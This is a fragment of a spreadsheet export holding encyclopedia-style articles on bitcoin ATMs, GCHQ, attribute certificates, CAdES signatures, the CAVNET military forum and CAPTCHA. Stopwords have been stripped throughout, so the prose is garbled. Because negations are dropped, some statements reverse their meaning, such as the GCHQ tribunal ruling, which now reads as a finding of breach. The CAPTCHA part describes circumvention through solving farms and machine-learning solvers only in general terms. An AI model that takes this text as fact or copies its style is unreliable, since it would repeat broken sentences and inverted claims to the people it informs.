located select moneygram locations coinstar machines. europe coin radar, 1,026 bitcoin atms across european union member area. nations union highest number bitcoin atms spain (174), austria (133), poland (114), romania (87), czechia (69), greece (63) italy (60). south africa there total bitcoin atms south africa according coin radar, africa. atms fiat rand (zar) transactions 10,000zar ($667) require verification. these atms mostly found cape town, durban, johannesburg pretoria. compliance bitcoin operators need adjust limits deposits withdrawals according aml/kyc standards applicable jurisdiction atms placed. countries states requires money transmitter license. united states, bank secrecy (bsa) requires bitcoin operators establish maintain effective written program reasonably designed prevent machines used facilitate money laundering financing terrorist activities. bitcoin operators must registered money service businesses regulated financial crimes enforcement network.in march 2022, financial conduct authority (fca) united kingdom declared cryptocurrency atms country illegal would need shut down. none atm's operators successfully registered agency. cited failure comply know customer laws (kyc), track prevent money laundering, well high risk customers, lack regulation protection. time, coin radar listed atms country. also digital currency cryptocurrency cryptocurrencies europe references external links media related bitcoin atms wikimedia commons</t>
  </si>
  <si>
    <t>Communications-Electronics Security Group</t>
  </si>
  <si>
    <t>government communications headquarters, commonly known gchq, intelligence security organisation responsible providing signals intelligence (sigint) information assurance (ia) government armed forces united kingdom. based "the doughnut" suburbs cheltenham, gchq responsibility country's secretary state foreign commonwealth affairs (foreign secretary), part foreign office director ranks permanent secretary. gchq originally established first world government code cypher school (gc&amp;cs) known name 1946. during second world located bletchley park, responsible breaking german enigma codes. there main components gchq, composite signals organisation (cso), responsible gathering information, national cyber security centre (ncsc), responsible securing uk's communications. joint technical language service (jtls) small department cross-government resource responsible mainly technical language support translation interpreting services across government departments. co-located gchq administrative purposes. 2013, gchq received considerable media attention former national security agency contractor edward snowden revealed agency process collecting online telephone data tempora programme. snowden's revelations began spate ongoing disclosures global surveillance. guardian newspaper forced destroy computer hard drives files snowden given threats lawsuit official secrets act. structure gchq director gchq, jeremy fleming, corporate board, made executive non-executive directors. reporting corporate board are: sigint missions: comprising maths cryptanalysis, computer systems, linguistics translation, intelligence analysis unit enterprise: comprising applied research emerging technologies, corporate knowledge information systems, commercial supplier relationships, biometrics corporate management: enterprise resource planning, human resources, internal audit, architecture national cyber security centre (ncsc). history government code cypher school (gc&amp;cs) during first world war, british army royal navy separate signals intelligence agencies, mi1b nid25 (initially known room respectively. 1919, cabinet's secret service committee, chaired lord curzon, recommended peacetime codebreaking agency created, task given director naval intelligence, hugh sinclair. sinclair merged staff nid25 mi1b organisation, initially consisted around 25–30 officers similar number clerical staff. titled "government code cypher school" (gc&amp;cs), cover-name chosen victor forbes foreign office. alastair denniston, member nid25, appointed operational head. initially control admiralty located watergate house, adelphi, london. public function advise security codes cyphers used government departments assist provision", also secret directive "study methods cypher communications used foreign powers". gc&amp;cs officially formed november 1919, produced first decrypt prior date, october. before second world war, gc&amp;cs relatively small department. 1922, main focus gc&amp;cs diplomatic traffic, service traffic ever worth circulating" initiative lord curzon, transferred admiralty foreign office. gc&amp;cs came supervision hugh sinclair, 1923 chief director gc&amp;cs. 1925, organisations co-located different floors broadway buildings, opposite james's park. messages decrypted gc&amp;cs distributed blue-jacketed files became known "bjs". 1920s, gc&amp;cs successfully reading soviet union diplomatic cyphers. however, 1927, clandestine soviet support general strike distribution subversive propaganda, prime minister stanley baldwin made details decrypts public.during second world war, gc&amp;cs based largely bletchley park, present-day milton keynes, working understanding german enigma machine lorenz ciphers. 1940, gc&amp;cs working diplomatic codes ciphers countries, tackling diplomatic cryptosystems. senior staff included alastair denniston, oliver strachey, dilly knox, john tiltman, edward travis, ernst fetterlein, josh cooper, donald michie, alan turing, gordon welchman, joan clarke, newman, william tutte, (jack) good, peter calvocoressi hugh foss.an outstation east, east combined bureau hong kong 1935 moved singapore 1939. subsequently, japanese advance malay peninsula, army codebreakers went wireless experimental centre delhi, india. navy codebreakers fecb went colombo, ceylon, kilindini, near mombasa, kenya. post second world gc&amp;cs renamed government communications headquarters (gchq) june 1946.the organisation first based eastcote northwest london, 1951 moved outskirts cheltenham, setting sites oakley benhall. major reasons selecting cheltenham town location headquarters united states army services supply european theater war, built telecommunications infrastructure region carry logistics tasks.following second world war, british intelligence shared information part ukusa agreement. principal aspect gchq equivalent, national security agency (nsa), share technologies, infrastructure information.gchq many signals intelligence (sigint) monitoring stations abroad. during early cold war, remnants british empire provided global network ground stations major contribution ukusa agreement; regarded little hong kong valuable these. monitoring stations largely inexpensive national service recruits, ended early 1960s, increased cost civilian employees caused budgetary problems. 1965 foreign office review found 11,500 staff involved sigint collection (8,000 gchq staff 3,500 military personnel), exceeding size diplomatic service. reaction suez eviction gchq several best foreign sigint collection sites, including perkar, ceylon site habbaniya, iraq. staff largely moved tented encampments military bases cyprus, later became sovereign base area.duncan campbell mark hosenball revealed existence gchq 1976 article time out; result, hosenball deported gchq profile media 1983 trial geoffrey prime, mole within created considerable media interest. trade union disputes 1984, gchq centre political when, wake strikes affected sigint collection, conservative government margaret thatcher prohibited employees belonging trade union. following breakdown talks failure negotiate no-strike agreement, believed membership union would conflict national security. number mass national one-day strikes held protest decision, claimed first step wider bans trade unions. appeals british courts european commission human rights unsuccessful. government offered money employee agreed give union membership. appeal resulted decision government's actions violation freedom association protection right organise convention.a no-strike agreement eventually negotiated lifted incoming labour government 1997, government communications group public commercial services union (pcs) formed represent interested employees grades. 2000, group former gchq employees, dismissed refusing give union membership, offered re-employment, three accepted. post cold 1990s: post-cold restructuring intelligence services 1994 formalised activities intelligence agencies first time, defining purpose, british parliament's intelligence security committee given remit examine expenditure, administration policy three intelligence agencies. objectives gchq defined working interests national security, particular reference defence foreign policies majesty's government; interests economic wellbeing united kingdom; support prevention detection serious crime". during introduction intelligence agency late 1993, former prime minister callaghan described gchq "full-blown bureaucracy", adding future bodies created provide oversight intelligence agencies "investigate whether functions gchq carries today still necessary."in late 1993 civil servant michael quinlan advised deep review work gchq following conclusion "review intelligence requirements resources", imposed agency. chief secretary treasury, jonathan aitken, subsequently held face face discussions intelligence agency directors assess savings wake quinlan's review. aldrich (2010) suggests john adye, director gchq performed badly meetings aitken, leading aitken conclude gchq "suffering out-of-date methods management out-of-date methods assessing priorities". gchq's budget £850 million 1993, (£1.84 billion 2021) compared £125 million security service (mi5 mi6). december 1994 businessman roger hurn commissioned begin review gchq, concluded march 1995. hurn's report recommended £100 million gchq's budget; large reduction suffered british intelligence agency since world division gchq, collected sigint russia, disappeared result cuts. cuts mostly reversed 2000 wake threats violent non-state actors, risks increased terrorism, organised crime illegal access nuclear, chemical biological weapons.david omand became director gchq 1996, greatly restructured agency face changing targets rapid technological change. omand introduced concept "sinews" "sigint systems") allowed flexible working methods, avoiding overlaps work creating fourteen domains, well-defined working scope. tenure omand also construction modern headquarters, intended consolidate sites oakley benhall single, open-plan work environment. located 176-acre site benhall, would largest building constructed secret intelligence operations outside united states.operations gchq's chung listening station hong kong ended 1994. gchq's hong kong operations extremely important relationship nsa, contributed investment equipment station. anticipation transfer hong kong chinese government 1997, hong kong stations operations moved australian defence satellite communications station geraldton western australia.operations used gchq's intelligence-gathering capabilities 1990s included monitoring communications iraqi soldiers gulf war, dissident republican terrorists real ira, various factions involved yugoslav wars, criminal kenneth noye. 1990s gchq began assist investigation cybercrime. 2000s: coping internet 2003, gchq moved building. built circular plan around large central courtyard, quickly became known doughnut. time, largest public-sector building projects europe, estimated cost £337 million. building, designed gensler constructed carillion, became base gchq's cheltenham operations.the public spotlight fell gchq late 2003 early 2004 following sacking katharine leaked observer confidential email agents united states' national security agency addressed gchq agents wiretapping delegates run-up 2003 iraq war.gchq gains intelligence monitoring wide variety communications electronic signals. this, number stations established overseas. listening stations cheltenham itself, bude, scarborough, ascension island, united states menwith hill. ayios nikolaos station cyprus british army gchq.in march 2010, gchq criticised intelligence security committee problems security practices failing meet targets work targeted cyber attacks.as revealed edward snowden guardian, gchq spied foreign politicians visiting 2009 g-20 london summit eavesdropping phonecalls emails monitoring computers, cases even ongoing summit keyloggers installed summit.according edward snowden, time gchq principal umbrella programs collecting communications: "mastering internet" (mti) internet traffic, extracted fibre-optic cables searched using tempora computer system. "global telecoms exploitation" (gte) telephone traffic.gchq also access internet monitoring programme prism least back june 2010. prism said give national security agency easy access systems nine world's internet companies, including google, facebook, microsoft, apple, yahoo, skype.from 2013, gchq realised public attitudes sigint changed former unquestioned secrecy longer appropriate acceptable. growing internet, together inherent insecurities, meant communications traffic private citizens becoming inextricably mixed targets openness handling issue becoming essential credibility organisation. internet become "cyber commons", dominance creating "second sigint". gchq transformed accordingly, including greatly expanded public relations legal departments, adopting public education cyber security important part remit. 2010s february 2014, guardian, based documents provided snowden, revealed gchq indiscriminately collected million private yahoo webcam images users across world. month intercept, based documents released snowden, revealed joint threat research intelligence group computer network exploitation units within gchq. their mission cyber operations based "dirty tricks" shut enemy communications, discredit, plant misinformation enemies. these operations gchq operations according conference slideshow presented gchq.soon becoming director gchq 2014, robert hannigan wrote article financial times topic internet surveillance, stating "however much [large technology companies] dislike become command control networks choice terrorists criminals" gchq sister agencies "cannot tackle challenges scale without greater support private sector", arguing internet users "would comfortable better sustainable relationship [intelligence] agencies tech companies". since 2013 global surveillance disclosures, large technology companies improved security become less co-operative foreign intelligence agencies, including generally requiring court order disclosing data. however head technology industry group techuk rejected claims, stating understood issues disclosure obligations "must based upon clear transparent legal framework effective oversight rather than, suggested, deal industry government".in 2015, documents obtained intercept national security agency whistleblower edward snowden revealed gchq carried mass-surveillance operation, codenamed karma police, since 2008. operation swept address internet users visiting websites, established public scrutiny oversight. karma police powerful spying tool conjunction gchq programs addresses could cross-referenced data. goal program, according documents, "either browsing profile every visible user internet, user profile every visible website internet."in 2015, gchq admitted first time court conducts computer hacking.in 2017, press secretary sean spicer alleged gchq conducted surveillance president donald trump, basing allegation statements made media commentator news segment. government formally apologised allegations promised would repeated. however, surveillance russian agents pick contacts made trump's campaign team run-up election, passed agencies.on october 2018, gchq joined instagram. personnel awards gchq personnel recognised annually charles, prince wales prince wales's intelligence community awards james's palace clarence house alongside members security service (mi5), secret intelligence service (mi6). awards citations given teams within agencies well individuals. security mission well mission gather intelligence, gchq long-time corresponding mission assist protection british government's communications. when government code cypher school (gc&amp;cs) created 1919, overt task providing security advice. gc&amp;cs's security section located mansfield college, oxford second world war.in april 1946, gc&amp;cs became gchq, gchq security section moved oxford join rest organisation eastcote later year. lcsa from 1952 1954, intelligence mission gchq relocated cheltenham; security section remained eastcote, march 1954 became separate, independent organisation: london communications security agency (lcsa), 1958 renamed london communications-electronic security agency (lcesa).in april 1965, units merged lcesa become communications-electronic security department (cesd). cesg october 1969, cesd merged gchq becoming communications-electronic security group (cesg).in 1977 cesg relocated eastcote cheltenham.cesg continued national technical authority information assurance, including cryptography. cesg manufacture security equipment, worked industry ensure availability suitable products services, gchq funded research areas, example centre quantum computation oxford university heilbronn institute mathematical research university bristol.in 21st century, cesg number assurance schemes check, clas, commercial product assurance (cpa) cesg assisted products service (caps). public encryption late 1969 concept public-key encryption developed proven james ellis, worked cesg (and cesd) since 1965. ellis lacked number theory expertise necessary build workable system. subsequently, feasible implementation scheme asymmetric algorithm invented another staff member clifford cocks, mathematics graduate. this fact kept secret 1997. ncsc 2016, national cyber security centre established gchq located london, uk's authority cybersecurity. absorbed replaced cesg well activities previously existed outside gchq: centre cyber assessment (cca), computer emergency response team (cert cyber-related responsibilities centre protection national infrastructure (cpni). joint technical language service joint technical language service (jtls) established 1955, drawing members small ministry defence technical language team others, initially provide standard english translations organisational expressions foreign language, discover correct english equivalents technical terms foreign languages discover correct expansions abbreviations language. remit jtls expanded ensuing years cover technical language support interpreting translation services across government local public sector services gloucestershire surrounding counties. jtls also produces publishes foreign language working aids crown copyright conducts research machine translation on-line dictionaries glossaries. jtls co-located gchq administrative purposes. international relationships gchq operates partnership equivalent agencies worldwide number bi-lateral multi-lateral relationships. principal united states (national security agency), canada (communications security establishment), australia (australian signals directorate) zealand (government communications security bureau), mechanism uk-us security agreement, broad intelligence-sharing agreement encompassing range intelligence collection methods. relationships alleged include shared collection methods, system described popular media echelon, well analysed product. legal basis gchq's legal basis enshrined intelligence services 1994 section follows: there shall continue government communications headquarters authority secretary state; and, subject subsection below, functions shall monitor interfere electromagnetic, acoustic emissions equipment producing emissions obtain provide information derived related emissions equipment encrypted material; provide advice assistance about— languages, including terminology used technical matters, (ii) cryptography matters relating protection information material, armed forces crown, majesty's government united kingdom northern ireland department organisation determined purposes section manner specified prime minister.(2) functions referred subsection (1)(a) shall exercisable only— interests national security, particular reference defence foreign policies majesty's government united kingdom; interests economic well-being united kingdom relation actions intentions persons outside british islands; support prevention detection serious crime. act, expression "gchq" refers government communications headquarters unit part unit armed forces crown time required secretary state assist government communications headquarters carrying functions. activities involve interception communications permitted regulation investigatory powers 2000; kind interception carried warrant issued secretary state. human rights 1998 requires intelligence agencies, including gchq, respect citizens' rights described european convention human rights. oversight prime minister nominates cross-party members parliament intelligence security committee. remit committee includes oversight intelligence security activities reports made directly parliament. functions increased justice security 2013 provide access investigatory powers.judicial oversight gchq's conduct exercised investigatory powers tribunal. also independent intelligence services commissioner interception communications commissioner, former senior judges.the investigatory powers tribunal ruled december 2014 gchq breach european convention human rights, activities compliant articles (right privacy) (freedom expression) european convention human rights. however, tribunal stated february 2015 particular aspect, data-sharing arrangement allowed intelligence services request data surveillance programmes prism upstream, contravention human rights prior paragraphs additional information, providing details procedures safeguards, disclosed public december 2014.furthermore, ruled legislative framework united kingdom permit mass surveillance gchq collects analyses data bulk, practice mass surveillance. this complements independent reports interception communications commissioner, special report made intelligence security committee parliament; although several shortcomings potential improvements oversight legislative framework highlighted. abuses despite inherent secrecy around much gchq's work, investigations carried government snowden disclosures admitted various abuses security services. report intelligence security committee (isc) 2015 revealed small number staff intelligence agencies found misuse surveillance powers, case leading dismissal member staff gchq, although laws place time make abuses criminal offence.later year, ruling investigatory powers tribunal found gchq acted unlawfully conducting surveillance human rights organisations. closed hearing found government breach internal surveillance policies accessing retaining communications egyptian initiative personal rights legal resources centre south africa. this second time ipt's history made positive determination favour applicants closed session.at another case 2015, gchq conceded "from january 2010, regime interception/obtaining, analysis, use, disclosure destruction legally privileged material accordance purposes article 8(2) european convention human rights accordingly unlawful". this admission made connection case brought abdelhakim belhaj, libyan opponent former gaddafi regime, wife fatima bouchard. couple accused british ministers officials participating unlawful abduction, kidnapping removal libya march 2004, gaddafi still power.on 2021, european court human rights (echr) ruled gchq guilty violating data privacy rules bulk interception communications, provide sufficient protections confidential journalistic material gathers communications bulk. surveillance parliamentarians 2015 complaint green party caroline lucas british intelligence services, including gchq, spying allegedly defiance laws prohibiting it."then-home secretary, theresa may, told parliament 2014 that: obviously, wilson doctrine applies parliamentarians. absolutely exclude powers parliamentarians, sets certain requirements powers used relation parliamentarian. case parliamentarians excluded nobody else country certain rules protocols requirement powers parliamentarian. investigatory powers tribunal investigated complaint, ruled contrary allegation, gave communications parliament special protection. wilson doctrine merely acts political convention. constitutional legal case controversial gchq case determined scope judicial review prerogative powers (the crown's residual powers common law). this council civil service unions minister civil service [1985] (often known simply "gchq case"). case, prerogative order council used prime minister (who minister civil service) trade union activities civil servants working gchq. this order issued without consultation. house lords decide whether reviewable judicial review. held executive action immune judicial review simply uses powers derived common rather statute (thus prerogative reviewable). leadership following list heads operational heads gchq gc&amp;cs: hugh sinclair (1919 1939) (founder) alastair denniston (1921 february 1942) (operational head) edward travis kcmg (february 1942 1952) eric jones kcmg (april 1952 1960) clive loehnis kcmg (1960–1964) leonard hooper kcmg (1965–1973) arthur bonsall kcmg (1973–1978) brian john maynard tovey kcmg (1978–1983) peter marychurch kcmg (1983–1989) john anthony adye kcmg (1989–1996) david omand (1996 –1997) kevin tebbit (1998) francis richards kcmg (1998–2003) david pepper kcmg (2003–2008) iain lobban kcmg (2008–2014) robert hannigan (2014–2017) jeremy fleming kcmg (2017–present) stations former stations following stations former stations operated since cold war. gchq certified training gchq certified training (gct) scheme established certify main levels cybersecurity training. there also degree masters level courses. these are: awareness level training: giving understanding foundation cybersecurity concepts; application level training: in-depth coursethe scheme designed help organisations find right training also gchq's exacting standards. designed assure high-quality cybersecurity training courses training provider also undergone rigorous quality checks. process carried apmg independent certification body. scheme part national cyber security programme established government develop knowledge, skills capability aspects cybersecurity the, based iisp skills framework. popular culture historical drama film imitation game (2014) featured benedict cumberbatch portraying alan turing's efforts break enigma code employed government code cypher school.gchq number cryptic online challenges public, used attract interest recruitment, starting late 1999. response 2004 challenge described "excellent", challenge 2015 600,000 attempts. also published gchq puzzle book 2016 sold 300,000 copies, proceeds going charity. second book published october 2018.gchq appeared doctor 2019 special "resolution" reconnaissance scout dalek storms facility exterminates staff order organisation's resources summon dalek fleet.gchq setting 2020 sitcom intelligence, featuring david schwimmer incompetent american officer liaising gchq's cyber crimes unit.gchq setting 2022 channel drama undeclared war. near future, depicts work experience student government agency cyberattack implications. also gchq units: joint operations cell national cyber security centregchq specifics: capenhurst said home gchq monitoring site 1990s hugh alexander head cryptanalysis division gchq 1949 1971 operation socialist, 2010–13 operation belgium zircon, 1980s cancelled gchq satellite projectuk agencies: british intelligence agencies joint forces intelligence group intelligence cyber security communityelsewhere: signals intelligence alliances, nations industries equivalent united states organisation notes references bibliography aldrich, richard (2010). gchq: uncensored story britain's most secret intelligence agency. harpercollins. isbn 978-0007278473. ferris, john (2020). behind enigma: authorised history gchq. bloomsbury. isbn 978-1-5266-0546-7. johnson, john (1997). evolution british sigint: 1653–1939. hmso. asin b002alsxtc. kahn, david (1991). seizing enigma: race break german u-boats codes, 1939–1943. houghton mifflin. isbn 978-0395427392. smith, michael (2001). "gc&amp;cs first cold war". smith, michael; erskine, ralph (eds.). action this day: bletchley park breaking enigma code birth modern computer. bantam press. isbn 978-0593049105. external links official website majesty's government communications centre govcertuk gchq: britain's most secret intelligence agency bbc: final look gchq's secret oakley site cheltenham incenser, gchq tapping internet cables</t>
  </si>
  <si>
    <t>Authorization certificate</t>
  </si>
  <si>
    <t>computer security, attribute certificate, authorization certificate (ac) digital document containing attributes associated holder issuer. when associated attributes mainly used purpose authorization, called authorization certificate. standardized x.509. 5755 specifies usage authorization purpose internet. authorization certificate works conjunction public certificate (pkc). while issued certificate authority (ca) used proof identity holder like passport, authorization certificate issued attribute authority (aa) used characterize entitle holder like visa. because identity information seldom changes long validity time attribute information frequently changes short validity time, separate certificates different security rigours, validity times issuers necessary. comparison attribute public certificates resembles contains public verifier control issuer, therefore, trusts issuer directly public issuer preinstalled. this means issuer's private compromised, issuer generate pair replaces public verifiers control one. verification requires presence referred holder pkc, chained delegate attributions. example, authorization certificate issued alice authorizes particular service. alice delegate privilege assistant issuing bob's pkc. when wants service, presents chain starting issued alice alice's issued issuer service trusts. way, service verify alice delegated privilege alice authorized service issuer controls service. 3281, however, recommend chains complexity administering processing chain little internet. usage service resource issuer controls, user presents part service resource functions verifier. verifier first check identity user using pkc, example, asking user decrypt message encrypted user's public pkc. authentication successful, verifier preinstalled public issuer check validity presented valid, verifier check whether specified matches presented pkc. matches, verifier check validity period still valid, verifier perform additional checks offering user particular level service resource usage accordance attributes contained example, software developer already wants deploy software computing device employing like ipad software device software approved device manufacturer. software developer signs software private sends signed software device manufacturer approval. after authenticating developer using reviewing software, manufacturer decide issue granting software basic capability install executed well additional capability wi-fi device following principle least privilege. example, refer developer holder software, example, storing developer's signature software holder field when software computing device, device verify integrity software using developer's checking validity granting software access device functionalities. user also need obtain several different issuers particular service. example, company gives employees company-wide specifies engineering department work area. access engineering data, however, employee also needs security clearance head engineering department. example, resource engineering data needs preinstalled public keys company-wide engineering department issuers. contents typical attribute certificate version: version certificate. holder: holder certificate. issuer: issuer certificate. signature algorithm: algorithm certificate signed. serial number: unique issuance number given issuer. validity period: validity period certificate. attributes: attributes associated certificate holder. signature value: signature issuer whole data above. benefits using attribute certificate, service resource host need maintain access control list potentially large always connected network access central server like using kerberos. similar idea capabilities permission permissions) service resource stored service resource users using tamper resistance mechanism. also public certificate security assertion markup language shibboleth voms references external links spki/sdsi certificate documentation</t>
  </si>
  <si>
    <t>CAdES (computing)</t>
  </si>
  <si>
    <t>cades (cms advanced electronic signatures) extensions cryptographic message syntax (cms) signed data making suitable advanced electronic signatures. description general framework electronic signatures various kinds transactions like purchase requisition, contracts invoices. cades specifies precise profiles signed data making compliant european eidas regulation (regulation electronic identification trust services electronic transactions internal market). eidas regulation enhances repeals electronic signatures directive 1999/93/ec. eidas legally binding member states since july 2014. electronic signature created compliance eidas legal value handwritten signature.an electronic signature, technically implemented based cades status advanced electronic signature. this means uniquely linked signatory; capable identifying signatory; signatory control data used signature creation; identified data attached signature changed signing.a resulting property cades electronically signed documents remain valid long periods, even signer verifying party later attempts deny validity signature. cades-based electronic signature accepted court proceeding evidence; advanced electronic signatures legally binding. gets higher probative value enhanced qualified electronic signature. receive legal standing, needs doted digital certificate, encrypted security signature creation device ("qualified electronic signature"). authorship statement qualified electronic signature cannot challenged statement non-repudiable. document etsi electronic signature infrastructure (esi) advanced electronic signature (cades) describes framework. evolution framework main document describing format etsi electronic signature infrastructure (esi) advanced electronic signature (cades). etsi first issued v1.2.2 (2000–12). current release version release number v2.2.1 (2013-04). etsi working draft cades. drafts released documents publicly accessible [1]. etsi v.1.7.4 (2008-07) technically equivalent 5126. 5126 document builds existing standards widely adopted. these include: 3852 "cryptographic message syntax (cms)" iso/iec 9594-8/itu-t recommendation x.509 "information technology open systems interconnection directory: authentication framework" 3280 "internet x.509 public infrastructure (pkix) certificate certificate revocation list (crl) profile" 3161 "internet x.509 public infrastructure time-stamp protocol (tsp)". profiles etsi 733" specifies formats advanced electronic signatures built (cades). defines number signed unsigned optional signature properties, resulting support number variations signature contents processing requirements. order maximize interoperability communities applying cades particular environments necessary identify common options appropriate environment. such selection commonly called profile.etsi 173" describes profiles cades signatures, particular context services directive, "directive 2006/123/ec european parliament council december 2006 services internal market".there four profiles available: cades-b: basic electronic signature, simplest version, containing signedinfo, signaturevalue, keyinfo signedproperties. this level combines -bes -epes levels. this form extends definition electronic signature conform identified signature policy cades-t: b-level trust service provider generated trusted token (time-mark time-stamp token) proving signature actually existed certain date time. cades-lt: built direct incorporation cades-t signatures conformant t-level, long-term-validation attribute containing values certificates values certificate revocation status used validate signature. cades-lta: signature conformant lt-level long-term-validation attribute poevalue incorporated. using periodical timestamping (e.g. year) prevented compromising signature weakening algorithms long time storage periods. this level equivalent level also european telecommunications standards institute (etsi) cryptographic message syntax xades, advanced electronic signature pades, advanced electronic signature asic, associated signature containers (asic) trusted timestamping references external links 5126 advanced electronic signatures (cades) 3126 electronic signature formats long term electronic signatures versions etsi cades secureblackbox cross-platform library creating manipulating cades, xades, pades asic signatures xolidosign desktop (free. supports windows above). supports cades-bes, cades-c cades-x-l. available languages free open-source java library creating/manipulating pades/cades/xades/asic signatures github repository cades, xades asic windows ades toolset</t>
  </si>
  <si>
    <t>CAVNET</t>
  </si>
  <si>
    <t>cavnet secure military forum became operational april 2004. part siprnet, allows fast access knowledge acquired ground combat.it used iraq war, helps military forces insurgents' adaptive tactics providing data laterally broader scale traditional reports.the data shared patrols "the net" sometimes referred soldiers) already played crucial role dismantle grenade-traps hidden behind posters moqtada al-sadr soldiers often down. references</t>
  </si>
  <si>
    <t>CAPTCHA</t>
  </si>
  <si>
    <t>captcha contrived acronym "completely automated public turing test tell computers humans apart") type challenge–response test used computing determine whether user human.the term coined 2003 luis ahn, manuel blum, nicholas hopper, john langford. common type captcha (displayed version 1.0) first invented 1997 groups working parallel. this form captcha requires someone correctly evaluate enter sequence letters numbers perceptible distorted image displayed screen. because test administered computer, contrast standard turing test administered human, captcha sometimes described reverse turing test.this user identification procedure received many criticisms, especially people disabilities, also people feel everyday work slowed distorted words difficult read. takes average person approximately seconds solve typical captcha. history since early days internet, users wanted make text illegible computers. first people hackers, posting sensitive topics internet forums thought automatically monitored keywords. circumvent filters, replaced word look-alike characters. hello could become |-|3|_|_() )-(3££0, well numerous variants, filter could possibly detect them. this later became known leetspeak.one earliest commercial uses captchas gausebeck–levchin test. 2000, idrive.com began protect signup page captcha prepared file patent seemingly novel technique. 2001, paypal used tests part fraud prevention strategy asked humans "retype distorted text programs difficulty recognizing." paypal cofounder levchin helped commercialize early use. popular deployment captcha technology, recaptcha, acquired google 2009. addition preventing fraud users, google used recaptcha captcha technology digitize archives york times books google books 2011. inventorship claims teams claimed first invent captchas used widely today. first team mark lillibridge, martín abadi, krishna bharat, andrei broder, used captchas 1997 altavista prevent bots adding uniform resource locator (urls) search engine. looking make images resistant optical character recognition (ocr) attack, team looked manual brother scanner, recommendations improving ocr's results (similar typefaces, plain backgrounds, etc.). team created puzzles attempting simulate manual claimed would cause ocr.the second team claim first invent captchas luis ahn, manuel blum, nicholas hopper, john langford, first described captchas 2003 publication subsequently received much coverage popular press. their notion captcha covers program distinguish humans computers.the controversy inventorship resolved existence 1997 priority date patent application eran reshef, gili raanan eilon solan (second group) worked sanctum application security firewall. their patent application details "the invention based applying human advantage applying sensory cognitive skills solving simple problems prove extremely hard computer software. such skills include, limited processing sensory information identification objects letters within noisy graphical environment". lillibridge, abadi, bharat, broder (first group) published patent 1998. both patents predate publications several years, though term captcha, describe ideas detail precisely depict graphical captchas used today. characteristics captchas are, definition, fully automated, requiring little human maintenance intervention administer, producing benefits cost reliability.the algorithm used create captcha must made public, though covered patent. this done demonstrate breaking requires solution difficult problem field artificial intelligence (ai) rather discovery (secret) algorithm, could obtained reverse engineering means.modern text-based captchas designed require simultaneous three separate abilities—invariant recognition, segmentation, parsing—to correctly complete task consistency. invariant recognition refers ability recognize large amount variation shapes letters. there overwhelmingly large number versions character human brain successfully identify. true computer, teaching recognize differing formations challenging task. segmentation, ability separate letter another, also made difficult captchas, characters crowded together white space between. context also critical. captcha must understood holistically correctly identify character. example, segment captcha, letter might look like "m". only whole word taken context become clear n.each problems poses significant challenge computer, even isolation. presence three time makes captchas difficult solve.unlike computers, humans excel type task. while segmentation recognition separate processes necessary understanding image computer, part process person. example, individual understands first letter captcha individual also understands contours are, also melds contours next letter. additionally, human brain capable dynamic thinking based upon context. able keep multiple explanations alive pick best explanation whole input based upon contextual clues. this also means fooled variations letters. relation whilst primarily used security reasons, captchas also serve benchmark task artificial intelligence technologies. according article ahn, blum langford, "any program passes tests generated captcha used solve hard unsolved problem."they argue advantages using hard problems means security twofold. either problem goes unsolved remains reliable method distinguishing humans computers, problem solved difficult problem resolved along case image text based captchas, capable accurately completing task without exploiting flaws particular captcha design, would solved problem developing capable complex object recognition scenes. accessibility captchas based reading text visual-perception tasks prevent blind visually impaired users accessing protected resource. however, captchas visual. hard artificial intelligence problem, speech recognition, used basis captcha. some implementations captchas permit users audio captcha, though 2011 paper demonstrated technique defeating popular schemes time.for non-sighted users (for example blind users, color blind people color-using test), visual captchas present serious problems. because captchas designed unreadable machines, common assistive technology tools screen readers cannot interpret them. since sites captchas part initial registration process, even every login, challenge completely block access. certain jurisdictions, site owners could become targets litigation using captchas discriminate certain people disabilities. example, captcha make site incompatible section united states. cases, sight difficulties choose identify word read them.while providing audio captcha allows blind users read text, still hinders blind deaf. according sense.org.uk, people vision hearing impairments. there 23,000 people serious vision hearing impairments. according national technical assistance consortium children young adults deaf-blind (ntac), number deafblind children increased 9,516 10,471 period 2004 2012. gallaudet university quotes 1980 2007 estimates suggest upwards 35,000 fully deafblind adults usa. deafblind population estimates depend heavily degree impairment used definition.the captcha thus excludes small percentage users using significant subsets common web-based services paypal, gmail, orkut, yahoo!, many forum weblog systems, etc.even perfectly sighted individuals, generations graphical captchas, designed overcome sophisticated recognition software, hard impossible read.a method improving captcha ease work proposed protectwebform named "smart captcha". developers advised combine captcha javascript. since hard bots parse execute javascript, combinatory method fills captcha fields hides image field human eyes proposed.one alternative method involves displaying user simple mathematical equation requiring user enter solution verification. although much easier defeat using software, suitable scenarios graphical imagery appropriate, provide much higher level accessibility blind users image-based captchas. these sometimes referred maptchas "mathematical"). however, difficult users cognitive disorder.other kinds challenges, require understanding meaning text (e.g., logic puzzle, trivia question, instructions create password) also used captcha. again, little research resistance countermeasures. circumvention there approaches defeating captchas: using cheap human labor recognize them, exploiting bugs implementation allow attacker completely bypass captcha, finally using machine learning build automated solver. according former google "click fraud czar" shuman ghosemajumder, numerous services solve captchas automatically. machine learning-based attacks earliest iterations systematic methodology designing evaluating captchas. result, many instances captchas fixed length therefore automated tasks could constructed successfully make educated guesses segmentation take place. other early captchas contained limited sets words, made test much easier game. still others made mistake relying heavily background confusion image. case, algorithms created successfully able complete task exploiting design flaws. these methods proved brittle however, slight changes captcha easily able thwart them. modern captchas like recaptcha longer rely fixed patterns instead present variations characters often collapsed together, making segmentation almost impossible. these newest iterations much successful warding automated tasks. october 2013, artificial intelligence company vicarious claimed developed generic captcha-solving algorithm able solve modern captchas character recognition rates 90%. however, luis ahn, pioneer early captcha founder recaptcha, expressed skepticism, stating: "it's hard impressed since every months." pointed similar claims vicarious made since 2003.in august 2014 usenix woot conference, bursztein presented first generic captcha-solving algorithm based reinforcement learning demonstrated efficiency many popular captcha schemas. they concluded text distortion based captchas schemes considered insecure moving forward.in october 2018 ccs'18 conference, presented deep learning-based attack could successfully solve text captcha schemes used top-50 popular website 2018 high success rate. their work shows effective captcha solver trained using real captchas, showing possible quickly launch attack text captcha scheme. cheap unwitting human labor possible subvert captchas relaying sweatshop human operators employed decode captchas. 2005 paper working group stated operator could verify hundreds hour. 2010, university california diego conducted large scale study captcha farms found retail price solving million captchas $1,000.another technique described consists using script re-post target site's captcha captcha site owned attacker, unsuspecting humans visit correctly solve within short script use. this technique likely economically unfeasible attackers cost attracting enough users running popular site. outsourcing paid services there multiple internet companies like 2captcha deathbycaptcha offer human machine backed captcha solving services us$0.50 1000 solved captchas. these services offer apis libraries enable users integrate captcha circumvention tools captchas designed block first place. insecure implementation howard yeend identified implementation issues poorly 